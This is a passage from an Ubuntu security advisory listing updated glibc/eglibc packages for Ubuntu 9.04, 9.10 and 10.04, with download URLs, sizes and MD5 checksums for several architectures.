8d8eb26761ba2ba47e1bfa10e7f844af\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.9-4ubuntu6.2_i386.udeb\r\n Size/MD5: 10096 4eac747d74a64a49b31913ec0464c599\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.9-4ubuntu6.2_i386.udeb\r\n Size/MD5: 16142 49bc6a8beb43c2e2e962752f83f39e77\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/g/glibc/libc6-xen_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 1249692 4141fea57a1129ca26f156df70967a11\r\n http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.9-4ubuntu6.2_i386.deb\r\n Size/MD5: 192220 463feb16a31f2ba1c0e3f36fdc479204\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dbg_2.9-4ubuntu6.2_lpia.deb\r\n Size/MD5: 5830896 c439aacd03624b073aa0e5c53b4e67d6\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev_2.9-4ubuntu6.2_lpia.deb\r\n Size/MD5: 2127690 e93d4cfd06603bb82f67f41a3425c8ca\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-pic_2.9-4ubuntu6.2_lpia.deb\r\n Size/MD5: 1222342 66d550fef636fb73df4b12ba7deb1ef8\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-prof_2.9-4ubuntu6.2_lpia.deb\r\n Size/MD5: 1570720 db1e324e20a7a761eaf8bbd7320dc3be\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-udeb_2.9-4ubuntu6.2_lpia.udeb\r\n Size/MD5: 901796 ad45e0599ee31d8aed30d8c02f8c8227\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6_2.9-4ubuntu6.2_lpia.deb\r\n Size/MD5: 4558818 001fb9626e587f9bc8b2f40a1f59d3da\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-dns-udeb_2.9-4ubuntu6.2_lpia.udeb\r\n Size/MD5: 10516 d22a5e569e7df08ef9f8db35774a553e\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-files-udeb_2.9-4ubuntu6.2_lpia.udeb\r\n Size/MD5: 17030 34223418278071412f3b5f1a93fbbff9\r\n http://ports.ubuntu.com/pool/universe/g/glibc/nscd_2.9-4ubuntu6.2_lpia.deb\r\n Size/MD5: 195736 048bfc2511e95114353aa04fffc9668f\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dbg_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 12023960 c7502e05029dcb17479c49014b1b0d98\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev-ppc64_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 2435370 6a06c0e13a8da8d1c4e57c687348ba67\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 2835520 0ee3d8e1e55e7e3218f793335a2e0cc4\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-pic_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 1633630 2db92fcf2fe5ab99deb61176d6399935\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-ppc64_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 4351012 6b6bcd0e010b06e3e0d5bd17caf35280\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-prof_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 2292502 c879d92c414ac26112c0c25f66b7fa50\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-udeb_2.9-4ubuntu6.2_powerpc.udeb\r\n Size/MD5: 1238750 6937fe72b7a1d36c4b64b0ca03c1fbb1\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 5077372 3dbbce05eceb4c69a153a3a9c238f74b\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-dns-udeb_2.9-4ubuntu6.2_powerpc.udeb\r\n Size/MD5: 10848 f963e6d04559bb569586e03eead5f35f\r\n \r\nhttp://ports.ubuntu.com/pool/main/g/glibc/libnss-files-udeb_2.9-4ubuntu6.2_powerpc.udeb\r\n Size/MD5: 17678 3fd3bae73ed0e654c5d07e7a2e694e80\r\n http://ports.ubuntu.com/pool/universe/g/glibc/nscd_2.9-4ubuntu6.2_powerpc.deb\r\n Size/MD5: 195190 7a1334abeddeb4b770641337809f87a0\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dbg_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 41730070 2901ec12447e705a20aebd6664950e8e\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev-sparc64_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 2611358 a51a473fddc8b81bc0b50b4f977cb42d\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-dev_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 2853224 5fd3163eed86cb5fcb8f22165b0844cd\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-pic_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1646964 0161e5e4d8a472ddd4061eaf5989087f\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-prof_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 2335570 53faa5c2e0e63f888259d1c0288eb512\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparc64_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 4307926 9e9ac321176de4a82e543e0f8aa5b15d\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparc64b_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1676032 5e3a8b43b7d12dba19a02f2000e208bf\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparc64v2_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1645056 026cb519a419c91d4fa4f087969d4841\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparc64v_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1645912 a98b15ed81e4331f3f007a93ca22a7d3\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparcv9b_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1703058 496a81c4820f903d90d9efdf5978a601\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparcv9v2_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1669704 dd30f683a9f445b69acf30b7db5b7243\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-sparcv9v_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 1668794 0b444c3d9499fd0d2892670a30773cf5\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6-udeb_2.9-4ubuntu6.2_sparc.udeb\r\n Size/MD5: 1261986 c9d69e7fb82c1494651811d91bb65510\r\n http://ports.ubuntu.com/pool/main/g/glibc/libc6_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 5027636 7d4b2f4186184d69a9f42c532e8e09a6\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-dns-udeb_2.9-4ubuntu6.2_sparc.udeb\r\n Size/MD5: 9510 4ab5785386c3e5946bc286ba457fe7bc\r\n http://ports.ubuntu.com/pool/main/g/glibc/libnss-files-udeb_2.9-4ubuntu6.2_sparc.udeb\r\n Size/MD5: 15786 4397a6b24c05b52905f9da144d9ee3a2\r\n http://ports.ubuntu.com/pool/universe/g/glibc/nscd_2.9-4ubuntu6.2_sparc.deb\r\n Size/MD5: 193592 0738595feb516240f4f541711eea8d09\r\n\r\nUpdated packages for Ubuntu 9.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/eglibc_2.10.1-0ubuntu17.diff.gz\r\n Size/MD5: 2764610 d191364838300d9528a3dcdc23ed7832\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/eglibc_2.10.1-0ubuntu17.dsc\r\n Size/MD5: 3023 24c25f384a0127f1d185c3affa4e749a\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/eglibc_2.10.1.orig.tar.gz\r\n Size/MD5: 23283514 eceb7d0b99b383b87314216ecf85d79f\r\n\r\n Architecture independent packages:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/glibc-doc_2.10.1-0ubuntu17_all.deb\r\n Size/MD5: 3665716 962d3bb33133c935d7a0cbd788f3ca5e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/e/eglibc/eglibc-source_2.10.1-0ubuntu17_all.deb\r\n Size/MD5: 12662626 a76e036d5e5514c9063577693a58d8f5\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-bin_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 784008 b64d86cdaf233ce46414a651c1dddc25\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-dev-bin_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 217222 28c6099c629cd9f0ae0d9c1de44352c3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dbg_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 10134028 e3cd0be6485d21957702d43fcd79c661\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev-i386_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 1517454 1a1a9351dd44d14201246cae6b6c0ec7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 2648182 eb6007d889f28488064b9fb00b9fbc98\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-i386_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 3671710 6f14f4efa6f893e3b0c4f35cb72701c8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-pic_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 1594660 5e4102bc256482ba40c8ab8cedde0e78\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-prof_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 2101748 6685ad47a6965b8e3eae508638db3f9c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-udeb_2.10.1-0ubuntu17_amd64.udeb\r\n Size/MD5: 1203426 c995538c86d578511587329266dc8a33\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 4206456 061e43daf402bc6d00daf2d08a7e987e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-dns-udeb_2.10.1-0ubuntu17_amd64.udeb\r\n Size/MD5: 11714 fc16b9b2cd10bc61e8352c66f473a99f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-files-udeb_2.10.1-0ubuntu17_amd64.udeb\r\n Size/MD5: 20604 1c40ca8dc0cf0024605b4912e0d987cb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/e/eglibc/nscd_2.10.1-0ubuntu17_amd64.deb\r\n Size/MD5: 209322 b84cf9e42637dec9a46ef05333f79dd0\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-bin_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 715424 90482e38227a74bbc187e8beb83c9543\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-dev-bin_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 207072 8f4360805a00f748da31caa6c1c11b2b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-amd64_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 4028646 23ed6778ae2a52bdab8c847805b734ee\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dbg_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 16320108 1e8cb0893f2e2e3b02e8974c3c9dc79f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev-amd64_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 2006112 f97d047adc9567565e7cd0fc6cc3a4e0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 4762368 9157f97474b89085f215790334576755\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-i686_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 1198942 ced86ee49eb76bb3ca2051da4a713efe\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-pic_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 1225000 83f79ad1271d1c774817beafbef9a629\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-prof_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 1520498 496a6155b606fc00c2bc2423bdf0d9a6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-udeb_2.10.1-0ubuntu17_i386.udeb\r\n Size/MD5: 858082 e65b4b368e91f442dacd5e9ca086598b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-xen_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 1203822 b6e1ff1fbc02f6f02bf6a7f62987f9ed\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 3759426 2224021366fb3330852e48a013dcc7d8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-dns-udeb_2.10.1-0ubuntu17_i386.udeb\r\n Size/MD5: 10352 72f3b82d31846fd2f719b1b55559c002\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-files-udeb_2.10.1-0ubuntu17_i386.udeb\r\n Size/MD5: 16654 7f06cb95d112d7a19fd258686c867acb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/e/eglibc/nscd_2.10.1-0ubuntu17_i386.deb\r\n Size/MD5: 201202 b82eed92ddb635bccc88e27f40b833bc\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-bin_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 749230 0305dc258afb47827921a26bdbec8880\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-dev-bin_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 210708 a6fa88f99b91fc5f455d8964620a3c38\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dbg_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 5748396 d3626bbb1f8ffe23b54c6238958aa11f\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 2164224 e76887b205663c72ff072a5bb29c11db\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-pic_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 1252830 c5ebeb0b0ce34800d524f5872e200109\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-prof_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 1622630 c670092e5dbd9e5a4f70f4233f3d314a\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-udeb_2.10.1-0ubuntu17_lpia.udeb\r\n Size/MD5: 916122 6865d59b2aea3363f1fb38c5293c265b\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 3815562 73118ff8e737bcee40a5e3adfee00328\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libnss-dns-udeb_2.10.1-0ubuntu17_lpia.udeb\r\n Size/MD5: 10628 cbd0f6686781f975df75934dda5d0bad\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-files-udeb_2.10.1-0ubuntu17_lpia.udeb\r\n Size/MD5: 16924 faf7d75ff6b0d40d733a79cd1d00bdfd\r\n http://ports.ubuntu.com/pool/universe/e/eglibc/nscd_2.10.1-0ubuntu17_lpia.deb\r\n Size/MD5: 203098 fc6307c3eebe0982ef1f8972a92b53a1\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-bin_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 770646 93a62085c8c4136943d5771574c12baf\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-dev-bin_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 213310 15c53e076943b4d9cbd712aafa12f628\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dbg_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 11841628 0b45e497b2189cb8e8575d9efcc96a16\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev-ppc64_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 2393796 f1c26c9a4f56dc30e975508e05f3a104\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 2884532 666a9b85449458b2af0600b550c67bda\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-pic_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 1677464 150b26b238f188fd550121122a6a5cfc\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-ppc64_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 4335890 c063ba150b2523bcfb8fd48542a16a6c\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-prof_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 2357700 7aef87fbdb009265f1a49657ee3a67ae\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-udeb_2.10.1-0ubuntu17_powerpc.udeb\r\n Size/MD5: 1270036 34aeb02387158f91ce3a2fb7891cfe13\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 4328692 03ba77aa933940c6d80045955496af82\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-dns-udeb_2.10.1-0ubuntu17_powerpc.udeb\r\n Size/MD5: 10964 05ab15e2dc0952dcbd3ad230373db843\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-files-udeb_2.10.1-0ubuntu17_powerpc.udeb\r\n Size/MD5: 17626 4787bafb46813d14e4104697ac77d0bc\r\n http://ports.ubuntu.com/pool/universe/e/eglibc/nscd_2.10.1-0ubuntu17_powerpc.deb\r\n Size/MD5: 204466 84ad2b0256a310205390988feaf92f39\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-bin_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 740968 1bf8ca6632ac8fb0def0549fb7ac4475\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-dev-bin_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 211732 556e5b93ec547e1b6c10d9989f4259cb\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dbg_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 42159894 d8c2cd58c34f19e80a10208af28f39b8\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev-sparc64_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 2610838 3f188583b100ddecd5251aad5d11b44c\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 2911996 bac4dfa1e6d87f659e0121e7884e7ad5\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-pic_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1701482 8b719beb3db87ef808db513e5e7718a6\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-prof_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 2372168 52c8d86dbd2b09819369bc48f0a745ba\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 4314674 99b7806d2194224fe8efea7d3e2d5e37\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64b_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1810766 402b00c70b94d48de3dca13cf41ca462\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64v2_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1756014 3126ff38c961f8b7161eccfed64b92ec\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64v_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1757098 b25c2163ea812d41ab886c4d6bb1c1be\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparcv9b_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1644950 bf2720f4c20594e5c2ec1b0df947bc88\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparcv9v2_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1715336 f5d5d97f342f78d98a1e24bbc074ea37\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparcv9v_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 1714512 f9d2e86504e28c0122f8f32a6a0d98c2\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-udeb_2.10.1-0ubuntu17_sparc.udeb\r\n Size/MD5: 1300450 a5eafc7ebef9f3b4389ea87a7f36de62\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 4345332 46e36d3b7bfdad43ddcc1f09286f0437\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-dns-udeb_2.10.1-0ubuntu17_sparc.udeb\r\n Size/MD5: 9736 af151299a6f45ac6499a2e30a8cdbadf\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-files-udeb_2.10.1-0ubuntu17_sparc.udeb\r\n Size/MD5: 16298 f5c2f5089bc4f8e76dc38a5c272d8ee7\r\n http://ports.ubuntu.com/pool/universe/e/eglibc/nscd_2.10.1-0ubuntu17_sparc.deb\r\n Size/MD5: 203108 d0b9ccf17fcf7d4b3ee7acc0739717bb\r\n\r\nUpdated packages for Ubuntu 10.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/eglibc_2.11.1-0ubuntu7.1.diff.gz\r\n Size/MD5: 871997 6cb1fa46714a4ea872b0938530d1449f\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/eglibc_2.11.1-0ubuntu7.1.dsc\r\n Size/MD5: 3055 15057988269fe1555618a2972cc0a4a6\r\n http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/eglibc_2.11.1.orig.tar.gz\r\n Size/MD5: 23460095 26ec82ef1bd2644d1c2c872d8a6213e7\r\n\r\n Architecture independent packages:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/glibc-doc_2.11.1-0ubuntu7.1_all.deb\r\n Size/MD5: 3712616 b9b181fe273a594057a6e65a5bbf95c9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/e/eglibc/eglibc-source_2.11.1-0ubuntu7.1_all.deb\r\n Size/MD5: 11616074 d801ebabe501c001b78385ca9d793b3a\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-bin_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 810072 0489b93dfbc791b54591d8e3457e21b2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-dev-bin_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 223276 f04721a4e135a04eec5ccc4d0b6c7db5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dbg_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 10255746 a36cf25116233f0b15f32cd8c667972c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev-i386_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 1552808 3c744ca9d93d81b75ce031e2fe16a9de\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 2703180 2a5e3f050b1d2a50393c6ba12ef49089\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-i386_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 3710126 2700f4b229af3efd218fb67610d8f898\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-pic_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 1629800 66b8135ced121b530c95ff443e121041\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-prof_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 2156366 4dcf7f9d2a53935e0559d0d80b78a064\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-udeb_2.11.1-0ubuntu7.1_amd64.udeb\r\n Size/MD5: 1229358 b3f45ee5b58e3f1205c180759862c726\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 4249454 3c5f3f2d2cc35cb44a2cb4b2fff694be\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-dns-udeb_2.11.1-0ubuntu7.1_amd64.udeb\r\n Size/MD5: 11686 2180e846de578662b45fcf8449c66053\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-files-udeb_2.11.1-0ubuntu7.1_amd64.udeb\r\n Size/MD5: 21428 012253a5e8229cb25f1aba244fa492a7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/e/eglibc/nscd_2.11.1-0ubuntu7.1_amd64.deb\r\n Size/MD5: 210942 beecc7017379c71f69bc4ed50cd67a7b\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-bin_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 722658 22f9d5f517e79594aed98ba21d8448f5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc-dev-bin_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 212990 df89f49b2ac9d10d073a2f3c66b770fb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-amd64_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 4061930 77640fe9e6939467fc81cea059698796\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dbg_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 16490158 7b2f1a8c1549bc48368515d9b744c47f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev-amd64_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 2045282 fa53c541bc913da98fc06547529592e1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-dev_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 4839460 ec9848fc797098f9b7c643682f2118b3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-i686_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 1227982 24fe37a9fd4cb95b6f599e05332d2e1a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-pic_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 1233472 affd51c971e15359d35d7c803a2d3d7d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-prof_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 1536376 53325ae2a14df686ac4af152883c13f9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-udeb_2.11.1-0ubuntu7.1_i386.udeb\r\n Size/MD5: 861080 99cfc04f708da825ff619302e7343ac8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-xen_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 1232750 8540b9d72b7cbc05d64b19ba271fa010\r\n 